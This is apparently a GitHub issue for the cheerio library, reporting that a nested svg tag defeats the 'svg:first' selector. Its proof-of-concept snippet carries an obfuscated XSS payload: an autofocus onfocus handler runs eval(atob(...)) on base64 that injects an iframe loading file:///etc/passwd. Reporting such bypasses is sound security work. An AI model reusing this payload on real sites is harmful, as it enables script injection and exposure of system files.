svg:first #88

domdom2y2 · 2022-06-07T19:22:37Z

I saw you put svg:first on latest version which is 0.6.4. But actually if someone put to nested svg tag, then the 'first' comes to that you didn't intended to.
Check the below code.

const cheerio = require("cheerio");

const svg = `
<svg><svg height="100" src="x" tabindex="0" onfocus="eval(atob(this.id))" id="ZG9jdW1lbnQud3JpdGUoJzxzdmctZHVtbXk+PC9zdmctZHVtbXk+PGlmcmFtZSBzcmM9ImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwMHB4Ij48L2lmcmFtZT48c3ZnIHZpZXdCb3g9IjAgMCAyNDAgODAiIGhlaWdodD0iMTAwMCIgd2lkdGg9IjEwMDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHRleHQgeD0iMCIgeT0iMCIgY2xhc3M9IlJycnJyIiBpZD0iZGVtbyI+ZGF0YTwvdGV4dD48L3N2Zz4nKTs=" autofocus=""></svg>
`;

const $ = cheerio.load(svg, null, false)("svg:first");
console.log(`${$}`);

Then the result becomes like this.

<svg><svg height="100" src="x" tabindex="0" onfocus="eval(atob(this.id))" id="ZG9jdW1lbnQud3JpdGUoJzxzdmctZHVtbXk+PC9zdmctZHVtbXk+PGlmcmFtZSBzcmM9ImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwMHB4Ij48L2lmcmFtZT48c3ZnIHZpZXdCb3g9IjAgMCAyNDAgODAiIGhlaWdodD0iMTAwMCIgd2lkdGg9IjEwMDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHRleHQgeD0iMCIgeT0iMCIgY2xhc3M9IlJycnJyIiBpZD0iZGVtbyI+ZGF0YTwvdGV4dD48L3N2Zz4nKTs=" autofocus=""></svg>
</svg>

The text was updated successfully, but these errors were encountered:

domdom2y2 changed the title ~~Remote Code Injection vulnerable~~ svg:first has bug Jun 28, 2022

domdom2y2 changed the title ~~svg:first has bug~~ svg:first Feb 10, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

svg:first #88

svg:first #88

domdom2y2 commented Jun 7, 2022

svg:first #88

svg:first #88

Comments

domdom2y2 commented Jun 7, 2022